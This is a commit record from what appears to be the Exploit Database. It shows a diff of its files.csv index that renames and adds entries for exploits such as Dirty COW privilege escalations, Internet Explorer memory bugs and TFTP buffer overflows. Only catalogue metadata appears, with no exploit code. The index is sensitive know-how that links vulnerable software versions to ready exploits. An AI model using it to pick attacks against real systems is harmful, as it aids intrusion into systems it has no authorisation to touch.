DB: 2016-11-29

16 new exploits rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC) rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC) rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC) rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC) NTP 4.2.8p3 - Denial of Service Microsoft Internet Explorer 8 MSHTML - 'SRunPointer::SpanQualifier/RunType' Out-Of-Bounds Read (MS15-009) Microsoft Internet Explorer 11 MSHTML - 'CGeneratedContent::HasGeneratedSVGMarker' Type Confusion Microsoft Internet Explorer 10 MSHTML - 'CEditAdorner::Detach' Use-After-Free (MS13-047) Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - 'DOMImplementation' Type Confusion (MS16-009) Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1) Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1) Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2) Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation TFTP Server 1.4 - Buffer Overflow Remote Exploit (2) TFTP Server 1.4 - Remote Buffer Overflow (2) TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit) TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit) Android - 'BadKernel' Remote Code Execution VX Search Enterprise 9.1.12 - Buffer Overflow Sync Breeze Enterprise 9.1.16 - Buffer Overflow Disk Sorter Enterprise 9.1.12 - Buffer Overflow Dup Scout Enterprise 9.1.14 - Buffer Overflow Disk Savvy Enterprise 9.1.14 - Buffer Overflow Disk Pulse Enterprise 9.1.16 - Buffer Overflow Linux/x86 - Egg-hunter Shellcode (25 bytes) Linux/x86 - Egg-hunter Shellcode (31 bytes) RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion CMS Faethon 2.0 - (mainpath) Remote File Inclusion CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion SazCart 1.5 - (cart.php) Remote File Inclusion SazCart 1.5 - 'cart.php' Remote File Inclusion Cyberfolio 2.0 RC1 - (av) Remote File Inclusion Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion FipsCMS 4.5 - (index.asp) SQL Injection FipsCMS 4.5 - 'index.asp' SQL Injection AJ Classifieds 1.0 - (postingdetails.php) SQL Injection AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection RunCMS 1.5.2 - (debug_show.php) SQL Injection RunCMS 1.5.2 - 'debug_show.php' SQL Injection OneCMS 2.4 - (userreviews.php abc) SQL Injection OneCMS 2.4 - 'abc' Parameter SQL Injection RunCMS 1.6 - disclaimer.php Remote File Overwrite RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite PHPEasyData 1.5.4 - 'cat_id' SQL Injection FipsCMS - 'print.asp lg' SQL Injection Galleristic 1.0 - (index.php cat) SQL Injection gameCMS Lite 1.0 - (index.php systemId) SQL Injection PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection FipsCMS 2.1 - 'print.asp' SQL Injection Galleristic 1.0 - 'cat' Parameter SQL Injection GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting MusicBox 2.3.7 - (artistId) SQL Injection RunCMS 1.6.1 - (msg_image) SQL Injection MusicBox 2.3.7 - 'artistId' Parameter SQL Injection RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection vShare YouTube Clone 2.6 - (tid) SQL Injection vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection Cyberfolio 7.12 - (rep) Remote File Inclusion miniBloggie 1.0 - (del.php) Arbitrary Delete Post Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion miniBloggie 1.0 - 'del.php' Arbitrary Delete Post SazCart 1.5.1 - (prodid) SQL Injection SazCart 1.5.1 - 'prodid' Parameter SQL Injection Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection Joomla! Component com_datsogallery 1.6 - Blind SQL Injection Joomla! Component Datsogallery 1.6 - Blind SQL Injection Vortex CMS - 'index.php pageid' Blind SQL Injection AJ Article 1.0 - (featured_article.php) SQL Injection AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection Vortex CMS - 'pageid' Parameter Blind SQL Injection AJ Article 1.0 - 'featured_article.php' SQL Injection AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities ClanLite 2.x - SQL Injection / Cross-Site Scripting OneCMS 2.5 - (install_mod.php) Local File Inclusion OneCMS 2.5 - 'install_mod.php' Local File Inclusion AJ Auction Web 2.0 - (cate_id) SQL Injection AJ Auction 1.0 - 'id' SQL Injection AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection AJ Auction 1.0 - 'id' Parameter SQL Injection FipsCMS Light 2.1 - (r) SQL Injection FipsCMS Light 2.1 - 'r' Parameter SQL Injection AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection AJ Auction Pro Platinum - (seller_id) SQL Injection AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection miniBloggie 1.0 - (del.php) Blind SQL Injection miniBloggie 1.0 - 'del.php' Blind SQL Injection AJ Article - 'featured_article.php mode' SQL Injection AJ ARTICLE - (Authentication Bypass) SQL Injection AJ Article 1.0 - Authentication Bypass Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion AJ ARTICLE - Remote Authentication Bypass AJ Article 1.0 - Remote Authentication Bypass MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection MusicBox 2.3.8 - 'viewalbums.php' SQL Injection AJ Auction Pro OOPD 2.3 - 'id' SQL Injection AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection BigACE CMS 2.5 - 'Username' SQL Injection BigACE 2.5 - SQL Injection ZeusCart 2.3 - 'maincatid' SQL Injection ZeusCart 2.3 - 'maincatid' Parameter SQL Injection BigACE CMS 2.6 - (cmd) Local File Inclusion BigACE 2.6 - 'cmd' Parameter Local File Inclusion RunCMS 1.6.3 - (double ext) Remote Shell Injection RunCMS 1.6.3 - Remote Shell Injection AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection RunCMS 2m1 - store() SQL Injection RunCMS 2ma - post.php SQL Injection RunCMS 2m1 - 'store()' SQL Injection RunCMS 2ma - 'post.php' SQL Injection AJ Article - Persistent Cross-Site Scripting AJ Article 3.0 - Cross-Site Scripting admidio 2.3.5 - Multiple Vulnerabilities Admidio 2.3.5 - Multiple Vulnerabilities RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection MusicBox 2.3 - Type Parameter SQL Injection MusicBox 2.3 - 'type' Parameter SQL Injection RunCMS 1.x - Bigshow.php Cross-Site Scripting RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting RunCMS 1.2/1.3 - PMLite.php SQL Injection RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection RunCMS 1.x - Ratefile.php Cross-Site Scripting RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin) BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin) MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting MusicBox 2.3 - 'index.php' SQL Injection MusicBox 2.3 - 'index.php' Cross-Site Scripting MusicBox 2.3 - 'cart.php' Cross-Site Scripting MusicBox 2.3.4 - Page Parameter SQL Injection MusicBox 2.3.4 - 'page' Parameter SQL Injection MyWebland miniBloggie 1.0 - Fname Remote File Inclusion miniBloggie 1.0 - 'Fname' Remote File Inclusion BigACE 1.8.2 - item_main.php GLOBALS Parameter Remote File Inclusion BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion BigACE 1.8.2 - 'item_main.php' Remote File Inclusion BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion ClanLite - Config-PHP.php Remote File Inclusion ClanLite - 'conf-php.php' Remote File Inclusion FipsCMS 2.1 - PID Parameter SQL Injection FipsCMS 2.1 - 'pid' Parameter SQL Injection RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion FipsCMS 2.1 - 'forum/neu.asp' SQL Injection FipsCMS 2.1 - 'neu.asp' SQL Injection OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting OneCMS 2.6.1 - search.php search Parameter SQL Injection OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting OneCMS 2.6.1 - 'search' Parameter SQL Injection OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting RunCMS 'partners' Module - 'id' Parameter SQL Injection RunCMS Module Partners - 'id' Parameter SQL Injection Zeuscart v.4 - Multiple Vulnerabilities Zeuscart 4.0 - Multiple Vulnerabilities BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting Red Hat JBoss EAP - Deserialization of Untrusted Data
2016-11-29 05:01:20 +00:00 · 2016-11-29 05:01:20 +00:00 · 91b12c469e
commit 91b12c469e
parent b1cbed79e4
19 changed files with 1964 additions and 156 deletions
--- a/files.csv
+++ b/files.csv
@ -729,8 +729,8 @@ id,file,description,date,author,platform,type,port
 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0
 5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0
-5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
+5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
-5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
+5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
@ -5281,6 +5281,11 @@ id,file,description,date,author,platform,type,port
 40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040
 40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 MSHTML - 'Ptls5::LsFindSpanVisualBoundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0
 40828,platforms/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos,0
 40840,platforms/linux/dos/40840.py,"NTP 4.2.8p3 - Denial of Service",2016-11-28,"Magnus Klaaborg Stubman",linux,dos,0
 40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 MSHTML - 'SRunPointer::SpanQualifier/RunType' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
 40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 MSHTML - 'CGeneratedContent::HasGeneratedSVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
 40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 MSHTML - 'CEditAdorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
 40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5437,7 +5442,7 @@ id,file,description,date,author,platform,type,port
 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0
 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
-718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
+718,platforms/linux/local/718.c,"Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
 739,platforms/bsd/local/739.c,"FreeBSD TOP - Format String",2001-07-23,truefinder,bsd,local,0
 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0
 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0
@ -5787,7 +5792,7 @@ id,file,description,date,author,platform,type,port
 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
 4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
-4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
+4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
 4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
 4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
@ -6514,8 +6519,8 @@ id,file,description,date,author,platform,type,port
 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
-15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
+15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
-15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
+15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
@ -7832,7 +7837,7 @@ id,file,description,date,author,platform,type,port
 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
 24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0
-24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
+24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0
 24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
 24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
@ -7904,7 +7909,7 @@ id,file,description,date,author,platform,type,port
 25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
 26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0
-26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
+26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
 26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
 26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
@ -8636,8 +8641,8 @@ id,file,description,date,author,platform,type,port
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
-40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
+40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation",2016-10-21,"Robin Verton",linux,local,0
 40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
@ -8651,6 +8656,7 @@ id,file,description,date,author,platform,type,port
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
 40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)",2016-10-26,"Phil Oester",linux,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@ -8660,6 +8666,7 @@ id,file,description,date,author,platform,type,port
 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
 40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
 40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
 40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation",2016-11-28,FireFart,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -10073,7 +10080,7 @@ id,file,description,date,author,platform,type,port
 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,windows,remote,80
 10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0
 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0
-10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69
+10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,windows,remote,69
 10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote,0
 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0
 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0
@ -11167,7 +11174,7 @@ id,file,description,date,author,platform,type,port
 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,windows,remote,0
 18735,platforms/windows/remote/18735.rb,"Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,windows,remote,0
 18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0
-18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0
+18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0
 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote,0
 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0
